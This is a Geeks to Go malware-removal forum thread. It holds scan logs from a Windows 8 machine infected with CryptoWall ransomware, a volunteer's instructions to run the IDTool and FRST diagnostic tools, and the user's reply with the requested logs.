[2015/02/21 06:48:19 | 000,008,630 | ---- | M] () -- C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML
[2015/02/21 06:48:19 | 000,000,292 | ---- | M] () -- C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL
[2015/02/21 03:31:16 | 000,001,509 | RHS- | M] () -- C:\WINDOWS\SysNative\drivers\etc\hosts
[2015/02/21 03:30:59 | 000,023,552 | ---- | M] () -- C:\Users\Dorothy01\AppData\Local\pgkunge.dll
[2015/02/21 03:14:12 | 000,045,752 | ---- | M] () -- C:\HELP_DECRYPT.PNG
[2015/02/21 03:14:12 | 000,000,292 | ---- | M] () -- C:\HELP_DECRYPT.URL
[2015/02/20 19:18:37 | 000,037,624 | ---- | M] () -- C:\WINDOWS\SysNative\drivers\TrueSight.sys
[2015/02/20 18:55:48 | 000,000,918 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/02/20 18:46:34 | 000,000,922 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/02/19 22:03:44 | 000,002,305 | ---- | M] () -- C:\Users\Dorothy01\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2015/02/19 21:49:23 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\MBAMSwissArmy.sys
[2015/02/19 21:27:48 | 000,001,982 | ---- | M] () -- C:\Users\Public\Desktop\Avast Free Antivirus.lnk
[2015/02/19 21:27:38 | 001,050,432 | ---- | M] (AVAST Software) -- C:\WINDOWS\SysNative\drivers\aswsnx.sys
[2015/02/19 21:27:17 | 000,000,350 | -H-- | M] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2015/02/19 21:27:14 | 000,083,280 | ---- | M] (AVAST Software) -- C:\WINDOWS\SysNative\drivers\aswmonflt.sys
[2015/02/19 21:20:09 | 000,002,281 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/02/19 21:17:47 | 000,436,624 | ---- | M] (AVAST Software) -- C:\WINDOWS\SysNative\drivers\aswSP.sys
[2015/02/19 21:17:47 | 000,364,512 | ---- | M] (AVAST Software) -- C:\WINDOWS\SysNative\aswBoot.exe
[2015/02/19 21:17:47 | 000,267,632 | ---- | M] () -- C:\WINDOWS\SysNative\drivers\aswVmm.sys
[2015/02/19 21:17:47 | 000,065,776 | ---- | M] () -- C:\WINDOWS\SysNative\drivers\aswRvrt.sys
[2015/02/19 21:17:47 | 000,029,208 | ---- | M] () -- C:\WINDOWS\SysNative\drivers\aswHwid.sys
[2015/02/19 21:17:46 | 000,043,152 | ---- | M] (AVAST Software) -- C:\WINDOWS\avastSS.scr
[2015/02/19 21:07:04 | 000,023,552 | ---- | M] () -- C:\Users\Dorothy01\AppData\Local\pckunie.dll
[2015/02/19 18:15:42 | 000,003,180 | ---- | M] () -- C:\WINDOWS\SysWow64\InstallUtil.InstallLog
[2015/02/18 16:52:33 | 000,001,120 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/02/18 16:48:30 | 000,000,836 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/02/09 16:56:22 | 000,000,000 | -H-- | M] () -- C:\WINDOWS\SysNative\drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
[2015/02/01 20:32:48 | 000,000,384 | -H-- | M] () -- C:\ProgramData\@system3.att
[2015/02/01 20:32:32 | 000,000,648 | ---- | M] () -- C:\ProgramData\@system.temp
 
========== Files Created - No Company Name ==========
 
[2015/02/21 06:48:19 | 000,045,610 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG
[2015/02/21 06:48:19 | 000,008,630 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML
[2015/02/21 06:48:19 | 000,000,292 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL
[2015/02/21 03:30:59 | 000,023,552 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\pgkunge.dll
[2015/02/20 06:41:31 | 000,000,922 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/02/20 06:07:51 | 000,037,624 | ---- | C] () -- C:\WINDOWS\SysNative\drivers\TrueSight.sys
[2015/02/19 21:27:48 | 000,001,982 | ---- | C] () -- C:\Users\Public\Desktop\Avast Free Antivirus.lnk
[2015/02/19 21:20:55 | 000,000,350 | -H-- | C] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2015/02/19 21:20:09 | 000,002,305 | ---- | C] () -- C:\Users\Dorothy01\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2015/02/19 21:20:09 | 000,002,281 | ---- | C] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/02/19 21:18:11 | 000,000,918 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/02/19 21:17:51 | 000,267,632 | ---- | C] () -- C:\WINDOWS\SysNative\drivers\aswVmm.sys
[2015/02/19 21:17:51 | 000,065,776 | ---- | C] () -- C:\WINDOWS\SysNative\drivers\aswRvrt.sys
[2015/02/19 21:17:51 | 000,029,208 | ---- | C] () -- C:\WINDOWS\SysNative\drivers\aswHwid.sys
[2015/02/19 21:10:53 | 000,045,752 | ---- | C] () -- C:\HELP_DECRYPT.PNG
[2015/02/19 21:10:53 | 000,000,292 | ---- | C] () -- C:\HELP_DECRYPT.URL
[2015/02/19 21:07:04 | 000,023,552 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\pckunie.dll
[2015/02/19 18:15:33 | 000,003,180 | ---- | C] () -- C:\WINDOWS\SysWow64\InstallUtil.InstallLog
[2015/02/18 16:52:33 | 000,001,120 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/02/18 16:48:30 | 000,000,836 | ---- | C] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/02/11 17:53:10 | 001,002,728 | ---- | C] () -- C:\WINDOWS\SysNative\WinUSBCoInstaller2.dll
[2015/02/11 17:53:09 | 001,721,576 | ---- | C] () -- C:\WINDOWS\SysNative\WdfCoInstaller01009.dll
[2015/02/11 17:53:08 | 000,821,544 | ---- | C] () -- C:\WINDOWS\adb.exe
[2015/02/09 16:56:22 | 000,000,000 | -H-- | C] () -- C:\WINDOWS\SysNative\drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
[2015/01/12 15:11:10 | 000,008,562 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.HTML
[2015/01/12 15:11:10 | 000,001,270 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.PNG
[2015/01/12 15:10:39 | 000,008,562 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.HTML
[2015/01/12 15:10:39 | 000,001,270 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.PNG
[2015/01/12 15:09:31 | 000,008,562 | ---- | C] () -- C:\ProgramData\HELP_DECRYPT.HTML
[2015/01/12 15:09:31 | 000,001,270 | ---- | C] () -- C:\ProgramData\HELP_DECRYPT.PNG
[2015/01/05 14:15:04 | 000,015,872 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\cowitches.d
[2014/12/11 09:44:09 | 000,929,536 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\f5e83w4ef.dat
[2014/11/21 18:59:05 | 000,037,439 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\893686b8
[2014/11/21 18:59:05 | 000,026,477 | ---- | C] () -- C:\ProgramData\893686b8
[2014/11/21 18:59:05 | 000,022,327 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\893686b8
[2014/11/13 18:51:56 | 000,000,288 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\1B477081.reg
[2014/11/12 18:01:46 | 000,008,542 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
[2014/11/12 18:01:34 | 000,008,542 | ---- | C] () -- C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML
[2014/11/10 16:30:49 | 000,000,384 | -H-- | C] () -- C:\ProgramData\@system3.att
[2014/11/10 16:30:21 | 000,000,648 | ---- | C] () -- C:\ProgramData\@system.temp
[2014/10/14 09:39:07 | 000,930,400 | ---- | C] () -- C:\WINDOWS\SysWow64\PerfStringBackup.INI
[2014/10/14 09:34:22 | 000,000,000 | ---- | C] () -- C:\WINDOWS\ativpsrm.bin
[2014/09/24 01:24:06 | 000,002,255 | ---- | C] () -- C:\WINDOWS\SysWow64\WimBootCompress.ini
[2014/09/24 01:23:34 | 000,103,936 | ---- | C] () -- C:\WINDOWS\SysWow64\OEMLicense.dll
[2014/07/23 18:32:36 | 000,000,466 | ---- | C] () -- C:\WINDOWS\pirchutl.ini
[2014/07/23 18:32:36 | 000,000,060 | ---- | C] () -- C:\WINDOWS\pident.ini
[2014/07/23 15:49:01 | 000,000,043 | ---- | C] () -- C:\Users\Dorothy01\AppData\Roaming\WB.CFG
[2014/07/21 23:04:58 | 000,204,952 | ---- | C] () -- C:\WINDOWS\SysWow64\ativvsvl.dat
[2014/07/21 23:04:58 | 000,157,144 | ---- | C] () -- C:\WINDOWS\SysWow64\ativvsva.dat
[2014/07/21 23:04:46 | 000,003,917 | ---- | C] () -- C:\WINDOWS\SysWow64\atipblag.dat
[2014/07/21 23:04:04 | 000,995,342 | ---- | C] () -- C:\WINDOWS\SysWow64\amdocl_as32.exe
[2014/07/21 23:04:04 | 000,798,734 | ---- | C] () -- C:\WINDOWS\SysWow64\amdocl_ld32.exe
[2014/07/21 23:03:42 | 000,123,392 | ---- | C] () -- C:\WINDOWS\SysWow64\amdhdl32.dll
[2013/08/22 09:36:43 | 000,215,943 | ---- | C] () -- C:\WINDOWS\SysWow64\dssec.dat
[2013/08/22 09:36:42 | 000,000,741 | ---- | C] () -- C:\WINDOWS\SysWow64\NOISE.DAT
[2013/08/22 08:46:23 | 000,067,584 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2013/08/22 01:01:23 | 000,043,131 | ---- | C] () -- C:\WINDOWS\mib.bin
[2013/08/21 21:32:36 | 000,046,080 | ---- | C] () -- C:\WINDOWS\SysWow64\BWContextHandler.dll
[2013/08/21 17:55:20 | 000,364,544 | ---- | C] () -- C:\WINDOWS\SysWow64\msjetoledb40.dll
[2013/08/21 17:52:39 | 000,673,088 | ---- | C] () -- C:\WINDOWS\SysWow64\mlang.dat
[2012/09/01 00:08:59 | 000,000,141 | ---- | C] () -- C:\ProgramData\Microsoft.SqlServer.Compact.351.64.bc
 
========== ZeroAccess Check ==========
 
[2015/02/19 18:15:28 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/09/24 01:33:02 | 021,266,336 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/09/24 01:33:14 | 018,760,328 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2013/08/22 03:49:49 | 000,921,088 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2013/08/21 20:45:10 | 000,691,712 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2013/08/22 03:45:17 | 000,483,840 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2015/02/19 23:28:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Adhoxi
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Amcyocut
[2015/02/19 22:04:32 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\AVAST Software
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Byloaq
[2014/11/07 16:59:34 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\cfdrgbhf
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ciokov
[2014/10/22 16:04:06 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\dgTemp
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ecqootfi
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Edutsoix
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Egewtoi
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ekmiys
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Esisgyl
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ezrydu
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\FrameworkUpdate
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\FrameworkUpdate7
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Fuwutee
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Fyarxy
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Guhyanmo
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Gynika
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Hovoote
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Huqokayx
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Hyipfy
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Icxeewhu
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ihywkead
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Itsefo
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Itufefv
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Kuseyd
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Kybeuv
[2014/12/25 15:50:39 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Local Store
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Mawywopo
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Maypyz
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Obmukany
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ohvyev
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Olaqduqo
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Onpyym
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Pevyliu
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Qaedxa
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Rifiewyn
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ruyxku
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Senyzayr
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Sequefb
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Tapyara
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Tumiexcu
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ucucni
[2015/02/19 23:28:23 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\unpacked23206
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Upvukyy
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Veepme
[2014/09/07 12:18:02 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\WebApp
[2014/10/13 06:38:25 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\WildTangent
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Wiudiz
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Woakduwa
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Wuwuec
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Yhohybe
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ymqiuky
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ynopqual
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ytbynede
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Zacosia
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Zekubuab
[2015/02/19 07:40:05 | 000,000,000 | ---D | M] -- C:\Users\Dorothy01\AppData\Roaming\Ziqeexew
 
========== Purity Check ==========
 
 
 
========== Files - Unicode (All) ==========
[2014/11/10 16:30:02 | 000,000,448 | -H-- | M] ()(C:\Users\Dorothy01\AppData\Roaming\????) -- C:\Users\Dorothy01\AppData\Roaming\麽鎒駓覜
[2014/11/10 16:30:02 | 000,000,448 | -H-- | C] ()(C:\Users\Dorothy01\AppData\Roaming\????) -- C:\Users\Dorothy01\AppData\Roaming\麽鎒駓覜
 
< End of report >
 

  • 0

Advertisements


#2
dbreeze

dbreeze

    Trusted Helper

  • Malware Removal
  • 2,213 posts
Hi allforhimblog,

Welcome to Geeks to Go. My name is dbreeze and I'll be helping you with this problem. Before I get into the removal of malware / correction of your problem, I need you to be aware of the following:
  • Please read all of my response through at least once before attempting to follow the procedures described.I would recommend printing them out, if you can, as you can check off each step as you complete it. Also, as some of the cleaning may be done in Safe Mode and there will be no internet connection then, you will find that having the steps printed for reference speeds the cleaning process along. If there's anything you don't understand or isn't totally clear to you, please come back to me for clarification before you start those steps.
  • All of the assistants and staff at Geeks to Go are here on a volunteer basis; please respect our time given to the cause of helping others.If you are going to be away for more than 4 days, please let me know here. (I will do the same for you.) We do realize that 'life happens' and situations arise unexpectedly; we just ask that you keep us up to date. That being said, please notice the following Geeks to Go rule:
  • Posts that are not replied to in four (4) days will result in the topic being closed. We have not forgotten you; this is just an effort to keep the boards organized and flowing. To continue on your closed topic, please PM me or any Moderator to have the topic reactivated. If, at any time during our working together, I have not responded to you in 2 days (48 hours), then please PM me.
  • Malware removal is a complex, multiple step process; please stay with me on this thread (don't start another thread) until I declare that your logs are clean and you are good to go. The absence of apparent issues does not mean your system is clean; I will tell you when everything looks good for you to go and help you remove the tools we have used.
  • If any of the security programs on your system should give any warnings about the software tools I ask you to download and use, please do not be alarmed.All of the tools I will have you use are safe to use (as instructed) and malware free.
  • While we strive to disrupt your system as little as possible, things happen.If you can, it would be best to back up your personal files now (if you do not already have a backup). You can store these on a CD/DVD, USB drive or stick, anywhere but on your same system. This will save you from possible anguish later if something unforeseen happens.
  • Please do not run any other tools or scanners than what I ask you to.Some of the openly available software made for malware removal can make changes to your system that interfere with the cleaning of the malware, or even destroy your system. I will use only what the situation calls for and direct you in the proper use of that software.
  • Please do not attach any log files to your replies unless I specifically ask you.Instead please copy and paste so as to include the log in your reply. You can do this in separate posts if it's easier for you.
Let's get started....


FIRST >>>>

I see a hint that there maybe was or is some ransomware on this system; please run the following tool as a check.

IDToolbyNathan.png Scan with IDTool

Please download IDTool by Nathan and save the file to the desktop.
It will come as a zipped file, so you will need to unzip it. You may do it by right-clicking on it and choosing Extract All. Extract it to your desktop.
  • Enter the IDTool directory, right-click on IDToolbyNathan.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • IDTool needs Micorsoft .NET Framework environment to work properly, so if
    prompted to download & install it please agree.
  • Wait patiently until the tool will collect necessary data.
  • Once the main console is loaded, please press Rescan Computer and Generate a New Report.
  • When prompted at the main bar that Rescan is completed, press Generate Text Friendly Report for Forums.
  • Copy the entire content of the frame that appears. You may want to save it to a text file for your convenience.
Please include that contents in your next reply.


SECOND >>>>

I appreciate the OTL scan but for Win8 we prefer the following tool. Also, please make sure it is run from the desktop.

Please download Farbar Recovery Scan Tool 64bit and save it to your Desktop.
  • Right click the FRST file on your desktop and select "Run as Administrator..." (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • If an update is available, the program will inform you and download the update. Allow it do this please.
  • Press the Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please copy and paste log back here.
  • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.
Information to Reply with >>>>
  • The Ransomware IDTool log file.
  • The FRST.txt log file text.
  • The Addition.txt log file text.
  • Any concerns or questions you may have.

  • 0

#3
allforhimblog

allforhimblog

    Member

  • Topic Starter
  • Member
  • PipPip
  • 98 posts

You are absolutely right about there being ransomware on here.  When I booted back up in normal mode and connected to the internet, 4 files were downloaded automatically, a Help_Decrpyt picture, .txt file .html file and .url file, the screen went purple and then it popped up saying my files had been encrypted and junk.  I was able to alt+ctrl+delete and bring up task manager turned off some startup programs that didn't look familiar and was able to sign out and back in to do the scans. Thanks for the quick reply and attached are the requested logs!

 

IDTool Log

Infection Detection Tool v1.6 - Nathan Scott
--------------------------------------------
Date/Time: 2/21/2015 10:37:41 PM
Operating System: Windows 8
Service Pack: N/A
Version Number: 6.2
Product Type: Workstation
--------------------------------------------
[Detected Flags]
1.|  Possible CryptoWall Flag , HKCU\Software\D459277330F21B8C46B7BA72B04D3BE0\002344677ABBBBDE

 

 
 
FRST.TXT
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 21-02-2015
Ran by Dorothy01 (administrator) on DOROTHY on 21-02-2015 22:39:57
Running from C:\Users\Dorothy01\Desktop
Loaded Profiles: Dorothy01 (Available profiles: Dorothy01)
Platform: Windows 8.1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\HPConnectedRemoteService.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\ccsvchst.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\ccsvchst.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\HPConnectedRemoteUser.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6549136 2012-07-02] (Realtek Semiconductor)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [766688 2014-07-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [CLMLServer_For_P2G8] => c:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [111120 2012-06-07] (CyberLink)
HKLM-x32\...\Run: [CLVirtualDrive] => c:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491120 2012-07-02] (CyberLink Corp.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5227112 2015-02-19] (AVAST Software)
HKLM-x32\...\Run: [CrashReportSaver] => C:\WINDOWS\Installer\{4E61FB7C-E89A-4510-ADC1-B38572ADB03D}\msiexec.exe [1464320 2015-02-20] (EFD Software)
Winlogon\Notify\pckunie-x32: C:\Users\Dorothy01\AppData\Local\pckunie.dll ()
Winlogon\Notify\pgkunge-x32: C:\Users\Dorothy01\AppData\Local\pgkunge.dll ()
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [Driver Support] => C:\Program Files (x86)\Driver Support\Driver Support\DriverSupport.exe /applicationMode:systemTray /showWelcome:false
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [acikmao] => rundll32 "C:\Users\Dorothy01\AppData\Local\acikmao.dll",acikmao <===== ATTENTION
